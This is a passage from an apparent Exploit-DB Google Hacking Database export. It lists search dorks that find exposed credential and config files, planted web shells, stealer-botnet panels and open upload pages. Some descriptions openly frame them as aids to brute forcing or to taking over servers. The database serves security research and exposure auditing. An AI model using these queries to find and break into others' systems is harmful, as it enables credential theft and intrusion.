<shortDescription>intitle:&quot;index of&quot; &quot;db.properties&quot; | &quot;db.properties.BAK&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;db.properties&quot; | &quot;db.properties.BAK&quot;
# Files containing usernames and passwords.
# Date: 27/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;db.properties&quot; | &quot;db.properties.BAK&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;db.properties&quot; | &quot;db.properties.BAK&quot;</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6656</id>
<link>https://www.exploit-db.com/ghdb/6656</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;filezilla.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;filezilla.xml&quot;
# Sensitive directories containing many times usernames and passwords.
# Date: 5/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;filezilla.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;filezilla.xml&quot;</querystring>
<edb></edb>
<date>2020-11-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6670</id>
<link>https://www.exploit-db.com/ghdb/6670</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;password.yml</shortDescription>
<textualDescription>#Google Dork : intitle:&quot;index of&quot; &quot;password.yml&quot;
#Exploit Title : usernames and passwords can be found.
#Date : 17/11/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;password.yml</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;password.yml</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6664</id>
<link>https://www.exploit-db.com/ghdb/6664</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;sitemanager.xml&quot; | &quot;recentservers.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;sitemanager.xml&quot; | &quot;recentservers.xml&quot;
# Sensitive directories containing many times usernames and passwords.
# Date: 9/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;sitemanager.xml&quot; | &quot;recentservers.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;sitemanager.xml&quot; | &quot;recentservers.xml&quot;</querystring>
<edb></edb>
<date>2020-11-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6375</id>
<link>https://www.exploit-db.com/ghdb/6375</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;tomcat-users.xml&quot;</shortDescription>
<textualDescription>Description: intitle:&quot;index of&quot; &quot;tomcat-users.xml&quot;
This google dork gives us the web server apache tomcat username, password,
roles details.</textualDescription>
<query>intitle:&quot;index of&quot; &quot;tomcat-users.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;tomcat-users.xml&quot;</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Jose Praveen</author>
</entry>
<entry>
<id>6296</id>
<link>https://www.exploit-db.com/ghdb/6296</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; &quot;users.sql&quot;</shortDescription>
<textualDescription># Dork :intitle:&quot;index of&quot; &quot;users.sql&quot;
# Sensitive informations : User Names and Password
# Author : Ambadi MP
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;users.sql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;users.sql&quot;</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>5786</id>
<link>https://www.exploit-db.com/ghdb/5786</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:&quot;index of&quot; service.grp</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; service.grp
# By using this dork it's possible to find some admin usernames in
plain-text.
# Date: 13/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; service.grp</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; service.grp</querystring>
<edb></edb>
<date>2020-03-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5550</id>
<link>https://www.exploit-db.com/ghdb/5550</link>
<category>Files Containing Usernames</category>
<shortDescription>intitle:index.of &quot;users.db&quot;</shortDescription>
<textualDescription>dork:
intitle:index.of &quot;users.db&quot;
Author:Mayur Parmar(th3cyb3rc0p)
</textualDescription>
<query>intitle:index.of &quot;users.db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;users.db&quot;</querystring>
<edb></edb>
<date>2019-09-24</date>
<author>Mayur Parmar</author>
</entry>
<entry>
<id>3847</id>
<link>https://www.exploit-db.com/ghdb/3847</link>
<category>Files Containing Usernames</category>
<shortDescription>inurl:&quot;/root/etc/passwd&quot; intext:&quot;home/*:&quot;</shortDescription>
<textualDescription>inurl:&quot;/root/etc/passwd&quot; intext:&quot;home/*:&quot;</textualDescription>
<query>inurl:&quot;/root/etc/passwd&quot; intext:&quot;home/*:&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/root/etc/passwd&quot; intext:&quot;home/*:&quot;</querystring>
<edb></edb>
<date>2013-04-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4406</id>
<link>https://www.exploit-db.com/ghdb/4406</link>
<category>Files Containing Usernames</category>
<shortDescription>inurl:/profile.php?lookup=1</shortDescription>
<textualDescription>inurl:/profile.php?lookup=1
This google dork will help find administrator name in most websites and forums..Very helpful in brute forcing ...
Created SIVABALAN ( De King OF CYber )</textualDescription>
<query>inurl:/profile.php?lookup=1</query>
<querystring>https://www.google.com/search?q=inurl:/profile.php?lookup=1</querystring>
<edb></edb>
<date>2017-03-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4558</id>
<link>https://www.exploit-db.com/ghdb/4558</link>
<category>Files Containing Usernames</category>
<shortDescription>inurl:/_layouts/mobile/view.aspx?List=</shortDescription>
<textualDescription>I came across on a string \ dork that does not exist anywhere and it allows
you to see the metadata of all the domain's content &amp; index everything.
here is the dork 'inurl:/_layouts/mobile/view.aspx?List='
It enables you to access MIcrosoft Sharepoint CMS based domains
In the following format
You're able to view the source user (modified or created by)
1. Depending on the target it can be used in a brute-force attack for
constructing a password list with the internal user information.
2. It is a serious information disclosure issue (due to the reason that
some Government websites also use MIcrosoft Sharepoint) and it discloses
their employees names.
Eva Prokofiev</textualDescription>
<query>inurl:/_layouts/mobile/view.aspx?List=</query>
<querystring>https://www.google.com/search?q=inurl:/_layouts/mobile/view.aspx?List=</querystring>
<edb></edb>
<date>2017-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>129</id>
<link>https://www.exploit-db.com/ghdb/129</link>
<category>Files Containing Usernames</category>
<shortDescription>inurl:admin filetype:asp inurl:userlist</shortDescription>
<textualDescription>This search reveals userlists of administrative importance. Userlists found using this method can range from benign &quot;message group&quot; lists to system userlists containing passwords.</textualDescription>
<query>inurl:admin filetype:asp inurl:userlist</query>
<querystring>https://www.google.com/search?q=inurl%3Aadmin+filetype%3Aasp+inurl%3Auserlist&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>128</id>
<link>https://www.exploit-db.com/ghdb/128</link>
<category>Files Containing Usernames</category>
<shortDescription>inurl:admin inurl:userlist</shortDescription>
<textualDescription>This search reveals userlists of administrative importance. Userlists found using this method can range from benign &quot;message group&quot; lists to system userlists containing passwords.</textualDescription>
<query>inurl:admin inurl:userlist</query>
<querystring>https://www.google.com/search?q=inurl%3Aadmin+inurl%3Auserlist&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>194</id>
<link>https://www.exploit-db.com/ghdb/194</link>
<category>Files Containing Usernames</category>
<shortDescription>inurl:php inurl:hlstats intext:&quot;Server Username&quot;</shortDescription>
<textualDescription>This page shows the halflife stat script and reveals the username to the system. Table structure, database name and recent SQL queries are also shown on most systems.</textualDescription>
<query>inurl:php inurl:hlstats intext:&quot;Server Username&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Aphp+inurl%3Ahlstats+intext%3A%22Server+Username%22</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6627</id>
<link>https://www.exploit-db.com/ghdb/6627</link>
<category>Files Containing Usernames</category>
<shortDescription>inurl:user intitle:index of ext:sql | xls | xml | json | csv</shortDescription>
<textualDescription># Title: Sensitive Data Exposure
# Google Dork: inurl:user intitle:index of ext:sql | xls | xml | json | csv
# Date: 2020-09-24
# Author: Virendra Tiwari
# LinkedIn: https://www.linkedin.com/in/virendratiwari/
Thanks and Regards,
Virendra Tiwari
</textualDescription>
<query>inurl:user intitle:index of ext:sql | xls | xml | json | csv</query>
<querystring>https://www.google.com/search?q=inurl:user intitle:index of ext:sql | xls | xml | json | csv</querystring>
<edb></edb>
<date>2020-10-21</date>
<author>Virendra Tiwari</author>
</entry>
<entry>
<id>6625</id>
<link>https://www.exploit-db.com/ghdb/6625</link>
<category>Files Containing Usernames</category>
<shortDescription>jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:java -git -gitlab</shortDescription>
<textualDescription># Google Dork: jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:java -git -gitlab
# Exposed usernames and passwords.
# Date: 20/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:java -git -gitlab</query>
<querystring>https://www.google.com/search?q=jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:java -git -gitlab</querystring>
<edb></edb>
<date>2020-10-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6677</id>
<link>https://www.exploit-db.com/ghdb/6677</link>
<category>Files Containing Usernames</category>
<shortDescription>jdbc:sqlserver://localhost:1433 + username + password ext:yml | ext:java</shortDescription>
<textualDescription># Google Dork: jdbc:sqlserver://localhost:1433 + username + password ext:yml | ext:java
# Exposed usernames and passwords.
# Date: 9/1/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>jdbc:sqlserver://localhost:1433 + username + password ext:yml | ext:java</query>
<querystring>https://www.google.com/search?q=jdbc:sqlserver://localhost:1433 + username + password ext:yml | ext:java</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>292</id>
<link>https://www.exploit-db.com/ghdb/292</link>
<category>Files Containing Usernames</category>
<shortDescription>OWA Public folders &amp; Address book</shortDescription>
<textualDescription>This search jumps right to the main page of Outlook Web Access Public Folders and the Exchange Address Book:.An attacker can use the addressbook to enumerate usernames anonymously without having to logon. These usernames can then be used to guess the mailbox passwords. An attacker can also browse the public folders to gather extra information about the organisation.</textualDescription>
<query>inurl:root.asp?acs=anon</query>
<querystring>https://www.google.com/search?q=inurl:root.asp%3Facs%3Danon&amp;num=100&amp;safe=off&amp;output=search</querystring>
<edb></edb>
<date>2004-06-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>10</id>
<link>https://www.exploit-db.com/ghdb/10</link>
<category>Files Containing Usernames</category>
<shortDescription>sh_history files</shortDescription>
<textualDescription>Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations...</textualDescription>
<query>intitle:index.of .sh_history</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22Index+of%22+.sh_history</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>1399</id>
<link>https://www.exploit-db.com/ghdb/1399</link>
<category>Files Containing Usernames</category>
<shortDescription>site:extremetracking.com inurl:&quot;login=&quot;</shortDescription>
<textualDescription>The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the sites stats, including all the visitors to the site that is being tracked, including their IP adresses.</textualDescription>
<query>site:extremetracking.com inurl:&quot;login=&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=site%3Aextremetracking.com+inurl%3A%22login%3D%22+</querystring>
<edb></edb>
<date>2006-07-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>367</id>
<link>https://www.exploit-db.com/ghdb/367</link>
<category>Footholds</category>
<shortDescription>&quot;adding new user&quot; inurl:addnewuser -&quot;there are no domains&quot;</shortDescription>
<textualDescription>Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail).</textualDescription>
<query>&quot;adding new user&quot; inurl:addnewuser -&quot;there are no domains&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22adding+new+user%22+inurl%3Aaddnewuser+-%22there+are+no+domains%22</querystring>
<edb></edb>
<date>2004-07-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4430</id>
<link>https://www.exploit-db.com/ghdb/4430</link>
<category>Footholds</category>
<shortDescription>&quot;El Moujahidin Bypass Shell&quot; ext:php</shortDescription>
<textualDescription>Simple upload/dir shell
- Dxtroyer</textualDescription>
<query>&quot;El Moujahidin Bypass Shell&quot; ext:php</query>
<querystring>https://www.google.com/search?q=&quot;El Moujahidin Bypass Shell&quot; ext:php</querystring>
<edb></edb>
<date>2017-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>4282</id>
<link>https://www.exploit-db.com/ghdb/4282</link>
<category>Footholds</category>
<shortDescription>&quot;Fenix Final Version v2.0&quot; filetype:php</shortDescription>
<textualDescription>Web-Shell new, very interesting.
Have Fun.
Regards.
Rootkit Pentester.</textualDescription>
<query>&quot;Fenix Final Version v2.0&quot; filetype:php</query>
<querystring>https://www.google.com/search?q=&quot;Fenix Final Version v2.0&quot; filetype:php</querystring>
<edb></edb>
<date>2016-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4927</id>
<link>https://www.exploit-db.com/ghdb/4927</link>
<category>Footholds</category>
<shortDescription>&quot;File Manager - Current disk free&quot;</shortDescription>
<textualDescription># Google Dork: &quot;File Manager - Current disk free&quot;
# Date: 18/8/2018
# Exploit Author: srikwit
Google Dork to locate PhpSpy web shells
</textualDescription>
<query>&quot;File Manager - Current disk free&quot;</query>
<querystring>https://www.google.com/search?q=&quot;File Manager - Current disk free&quot;</querystring>
<edb></edb>
<date>2018-08-20</date>
<author>srikwit</author>
</entry>
<entry>
<id>4355</id>
<link>https://www.exploit-db.com/ghdb/4355</link>
<category>Footholds</category>
<shortDescription>&quot;File Manager Version 1.0&quot; &quot;Coded By&quot;</shortDescription>
<textualDescription>File Managers webshells. Enjoy with healthy.
Dork by Rootkit Pentester.</textualDescription>
<query>&quot;File Manager Version 1.0&quot; &quot;Coded By&quot;</query>
<querystring>https://www.google.com/search?q=&quot;File Manager Version 1.0&quot; &quot;Coded By&quot;</querystring>
<edb></edb>
<date>2016-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>1270</id>
<link>https://www.exploit-db.com/ghdb/1270</link>
<category>Footholds</category>
<shortDescription>&quot;index of /&quot; ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )</shortDescription>
<textualDescription>searches for scripts that let you upload files which you can then execute on the server.</textualDescription>
<query>&quot;index of /&quot; ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )</query>
<querystring>https://www.google.com/search?q=%22index+of+%2F%22+%28+upload.cfm+%7C+upload.asp+%7C+upload.php+%7C+upload.cgi+%7C+upload.jsp+%7C+upload.pl+%29&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2006-03-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4930</id>
<link>https://www.exploit-db.com/ghdb/4930</link>
<category>Footholds</category>
<shortDescription>&quot;index of&quot; /wp-content/uploads/shell.php</shortDescription>
<textualDescription>&quot;index of&quot; /wp-content/uploads/shell.php
This Google Dork discovers servers running Wordpress that are infected
with web shells.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>&quot;index of&quot; /wp-content/uploads/shell.php</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; /wp-content/uploads/shell.php</querystring>
<edb></edb>
<date>2018-08-21</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>4357</id>
<link>https://www.exploit-db.com/ghdb/4357</link>
<category>Footholds</category>
<shortDescription>&quot;PHP eMailer is created by&quot; ext:php</shortDescription>
<textualDescription>Dork: &quot;PHP eMailer is created by&quot; ext:php
PHP SMTP MAILER
No comment, don't waste your time for negative thinking.
NO SPAM PLEASE ..
Dork by INILERM</textualDescription>
<query>&quot;PHP eMailer is created by&quot; ext:php</query>
<querystring>https://www.google.com/search?q=&quot;PHP eMailer is created by&quot; ext:php</querystring>
<edb></edb>
<date>2016-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4361</id>
<link>https://www.exploit-db.com/ghdb/4361</link>
<category>Footholds</category>
<shortDescription>&quot;PHP Mailer&quot; &quot;priv8 Mailer&quot; ext:php</shortDescription>
<textualDescription>Dork: &quot;PHP Mailer&quot; &quot;priv8 Mailer&quot; ext:php
PHP (SMTP) MAILER
No comment, don't waste your time for negative thinking.
NO SPAM PLEASE ..
Dork by INILERM</textualDescription>
<query>&quot;PHP Mailer&quot; &quot;priv8 Mailer&quot; ext:php</query>
<querystring>https://www.google.com/search?q=&quot;PHP Mailer&quot; &quot;priv8 Mailer&quot; ext:php</querystring>
<edb></edb>
<date>2016-11-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1258</id>
<link>https://www.exploit-db.com/ghdb/1258</link>
<category>Footholds</category>
<shortDescription>&quot;Please re-enter your password It must match exactly&quot;</shortDescription>
<textualDescription>Invision Powerboard registration pages. Plain and simple.</textualDescription>
<query>&quot;Please re-enter your password It must match exactly&quot;</query>
<querystring>https://www.google.com/search?q=%22Please+re-enter+your+password+It+must+match+exactly%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2006-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6362</id>
<link>https://www.exploit-db.com/ghdb/6362</link>
<category>Footholds</category>
<shortDescription>&quot;radius-server key&quot; ext:cfg OR ext:log OR ext:txt</shortDescription>
<textualDescription># Google Dork: &quot;radius-server key&quot; ext:cfg OR ext:log OR ext:txt
# By using this dork some radius-server keys can be found.
# Date: 1/07/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;radius-server key&quot; ext:cfg OR ext:log OR ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;radius-server key&quot; ext:cfg OR ext:log OR ext:txt</querystring>
<edb></edb>
<date>2020-07-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4542</id>
<link>https://www.exploit-db.com/ghdb/4542</link>
<category>Footholds</category>
<shortDescription>&quot;Sorting Logs:&quot; &quot;Please enter your password&quot; &quot;Powered By&quot; -urlscan -alamy</shortDescription>
<textualDescription>Finds stealer botnet control panels (If you can guess the login, you'll
have access to the WHOLE botnet!)
Dxtroyer</textualDescription>
<query>&quot;Sorting Logs:&quot; &quot;Please enter your password&quot; &quot;Powered By&quot; -urlscan -alamy</query>
<querystring>https://www.google.com/search?q=&quot;Sorting Logs:&quot; &quot;Please enter your password&quot; &quot;Powered By&quot; -urlscan -alamy</querystring>
<edb></edb>
<date>2017-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4451</id>
<link>https://www.exploit-db.com/ghdb/4451</link>
<category>Footholds</category>
<shortDescription>&quot;WHMCS Auto Xploiter&quot;</shortDescription>
<textualDescription>Finds WHMCS exploit shellz in sites
Dxtroyer</textualDescription>
<query>&quot;WHMCS Auto Xploiter&quot;</query>
<querystring>https://www.google.com/search?q=&quot;WHMCS Auto Xploiter&quot;</querystring>
<edb></edb>
<date>2017-05-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4333</id>
<link>https://www.exploit-db.com/ghdb/4333</link>
<category>Footholds</category>
<shortDescription>&quot;You have selected the following files for upload (0 Files).&quot;</shortDescription>
<textualDescription>Find file upload pages.
The dork is: &quot;You have selected the following files for upload (0 Files).&quot;
Gabe Mills
Hacker</textualDescription>
<query>&quot;You have selected the following files for upload (0 Files).&quot;</query>
<querystring>https://www.google.com/search?q=&quot;You have selected the following files for upload (0 Files).&quot;</querystring>
<edb></edb>
<date>2016-09-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4409</id>
<link>https://www.exploit-db.com/ghdb/4409</link>
<category>Footholds</category>
<shortDescription>( ext:php ) ( inurl:/wp-content/uploads/AAPL/loaders/ )</shortDescription>
<textualDescription>Finds a few handy little web shells ;)
Dxtroyer</textualDescription>
<query>( ext:php ) ( inurl:/wp-content/uploads/AAPL/loaders/ )</query>
<querystring>https://www.google.com/search?q=( ext:php ) ( inurl:/wp-content/uploads/AAPL/loaders/ )</querystring>
<edb></edb>
<date>2017-03-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4201</id>
<link>https://www.exploit-db.com/ghdb/4201</link>
<category>Footholds</category>
<shortDescription>(intitle:&quot;phpshell&quot; OR intitle:&quot;c99shell&quot; OR intitle:&quot;r57shell&quot; OR intitle:&quot;PHP Shell &quot; OR intitle:&quot;phpRemoteView&quot;) `rwx` &quot;uname&quot;</shortDescription>
<textualDescription>(intitle:&quot;phpshell&quot; OR intitle:&quot;c99shell&quot; OR intitle:&quot;r57shell&quot; OR intitle:&quot;PHP Shell &quot; OR intitle:&quot;phpRemoteView&quot;) `rwx` &quot;uname&quot;</textualDescription>
<query>(intitle:&quot;phpshell&quot; OR intitle:&quot;c99shell&quot; OR intitle:&quot;r57shell&quot; OR intitle:&quot;PHP Shell &quot; OR intitle:&quot;phpRemoteView&quot;) `rwx` &quot;uname&quot;</query>
<querystring>https://www.google.com/search?q=(intitle:&quot;phpshell&quot; OR intitle:&quot;c99shell&quot; OR intitle:&quot;r57shell&quot; OR intitle:&quot;PHP Shell &quot; OR intitle:&quot;phpRemoteView&quot;) `rwx` &quot;uname&quot;</querystring>
<edb></edb>
<date>2016-02-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1361</id>
<link>https://www.exploit-db.com/ghdb/1361</link>
<category>Footholds</category>
<shortDescription>(intitle:&quot;SHOUTcast Administrator&quot;)|(intext:&quot;U SHOUTcast D.N.A.S. Status&quot;)</shortDescription>
<textualDescription>sHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts.</textualDescription>
<query>(intitle:&quot;SHOUTcast Administrator&quot;)|(intext:&quot;U SHOUTcast D.N.A.S. Status&quot;)</query>
<querystring>https://www.google.com/search?q=(intitle:%22SHOUTcast+Administrator%22)%7C(intext:%22U+SHOUTcast+D.N.A.S.+Status%22)&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1275</id>
<link>https://www.exploit-db.com/ghdb/1275</link>
<category>Footholds</category>
<shortDescription>(intitle:&quot;WordPress › Setup Configuration File&quot;)|(inurl:&quot;setup-config.php?step=&quot;)</shortDescription>
<textualDescription>Alter setup configuration files.add ?step=1</textualDescription>
<query>(intitle:&quot;WordPress › Setup Configuration File&quot;)|(inurl:&quot;setup-config.php?step=&quot;)</query>
<querystring>https://www.google.com/search?q=(intitle:%22WordPress+%E2%80%BA+Setup+Configuration+File%22)%7C(inurl:%22setup-config.php%3Fstep%3D%22)&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>610</id>
<link>https://www.exploit-db.com/ghdb/610</link>
<category>Footholds</category>
<shortDescription>(inurl:81/cgi-bin/.cobalt/) | (intext:&quot;Welcome to the Cobalt RaQ&quot;)</shortDescription>
<textualDescription>The famous Sun linux appliance. The default page displays this text:&quot;Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web&quot;.</textualDescription>
<query>(inurl:81/cgi-bin/.cobalt/) | (intext:&quot;Welcome to the Cobalt RaQ&quot;)</query>
<querystring>https://www.google.com/search?q=%28inurl%3A81%2Fcgi-bin%2F.cobalt%2F%29++%7C+%28intext%3A%22Welcome+to+the+Cobalt+RaQ%22+%29</querystring>
<edb></edb>
<date>2004-10-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>246</id>
<link>https://www.exploit-db.com/ghdb/246</link>
<category>Footholds</category>
<shortDescription>+htpasswd +WS_FTP.LOG filetype:log</shortDescription>
<textualDescription>WS_FTP.LOG can be used in many ways to find more information about a server. This query is very flexible, just substitute &quot;+htpasswd&quot; for &quot;+FILENAME&quot; and you may get several hits that you hadn't seen with the 'normal' search. Filenames suggested by the forum to explore are: phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet . The list goes on and on..A different approach might be &quot;allinurl: &quot;some.host.com&quot; WS_FTP.LOG filetype:log&quot; which tells you more about who's uploading files to a specific site.</textualDescription>
<query>+htpasswd +WS_FTP.LOG filetype:log</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%2Bhtpasswd+%2BWS_FTP.LOG+filetyp</querystring>
<edb></edb>
<date>2004-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>3668</id>
<link>https://www.exploit-db.com/ghdb/3668</link>
<category>Footholds</category>
<shortDescription>allintext:&quot;fs-admin.php&quot;</shortDescription>
<textualDescription>A foothold using allintext:&quot;fs-admin.php&quot; shows the world readable
directories of a plug-in that enables Wordpress to be used as a forum. Many
of the results of the search also show error logs which give an attacker the
server side paths including the home directory name. This name is often also
used for the login to ftp and shell access, which exposes the system to
attack. There is also an undisclosed flaw in version 1.3 of the software, as
the author has mentioned in version 1.4 as a security fix, but does not tell
us what it is that was patched.
Author: DigiP</textualDescription>
<query>allintext:&quot;fs-admin.php&quot;</query>
<querystring>https://www.google.com/search?q=allintext:&quot;fs-admin.php&quot;</querystring>
<edb></edb>
<date>2011-01-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>6285</id>
<link>https://www.exploit-db.com/ghdb/6285</link>
<category>Footholds</category>
<shortDescription>allinurl:XFrame.html</shortDescription>
<textualDescription>Dork: allinurl:XFrame.html
Find Microsoft Lync Server AutoDiscover
Discovered By: Kevin Randall
</textualDescription>
<query>Find Microsoft Lync Server AutoDiscover</query>
<querystring>https://www.google.com/search?q=Find Microsoft Lync Server AutoDiscover</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>4170</id>
<link>https://www.exploit-db.com/ghdb/4170</link>
<category>Footholds</category>
<shortDescription>crime24 stealer ext:txt</shortDescription>
<textualDescription>crime24 stealer ext:txt
atawho-sonadam-hackunity</textualDescription>
<query>crime24 stealer ext:txt</query>
<querystring>https://www.google.com/search?q=crime24 stealer ext:txt</querystring>
<edb></edb>
<date>2015-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>4023</id>
<link>https://www.exploit-db.com/ghdb/4023</link>
<category>Footholds</category>
<shortDescription>ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\/3R -</shortDescription>
<textualDescription>A new WebShell interesting. Have Fun.
By Rootkit.</textualDescription>
<query>ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\/3R -</query>
<querystring>https://www.google.com/search?q=ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\/3R -</querystring>
<edb></edb>
<date>2015-06-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>4173</id>
<link>https://www.exploit-db.com/ghdb/4173</link>
<category>Footholds</category>
<shortDescription>ext:aspx intitle:aspxspy</shortDescription>
<textualDescription>Asp shells
ext:aspx intitle:aspxspy
details:
http://atawho.blogspot.com.tr/2015/11/aspx-shell-dorku-ghbd.html
sonadam-atawho-hackunity</textualDescription>
<query>ext:aspx intitle:aspxspy</query>
<querystring>https://www.google.com/search?q=ext:aspx intitle:aspxspy</querystring>
<edb></edb>
<date>2016-01-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4646</id>
<link>https://www.exploit-db.com/ghdb/4646</link>
<category>Footholds</category>
<shortDescription>ext:jsp intext:&quot;jspspy&quot; intitle:&quot;Jspspy web~shell V1.0&quot;</shortDescription>
<textualDescription>Find login portals of jspspy webshell.
Huijun Chen
</textualDescription>
<query>ext:jsp intext:&quot;jspspy&quot; intitle:&quot;Jspspy web~shell V1.0&quot;</query>
<querystring>https://www.google.com/search?q=ext:jsp intext:&quot;jspspy&quot; intitle:&quot;Jspspy web~shell V1.0&quot;</querystring>
<edb></edb>
<date>2018-01-02</date>
<author>Huijun Chen</author>
</entry>
<entry>
<id>4497</id>
<link>https://www.exploit-db.com/ghdb/4497</link>
<category>Footholds</category>
<shortDescription>ext:php intext:&quot;-rwxr-xr-x&quot; site:.in</shortDescription>
<textualDescription>You can find the software affected at:
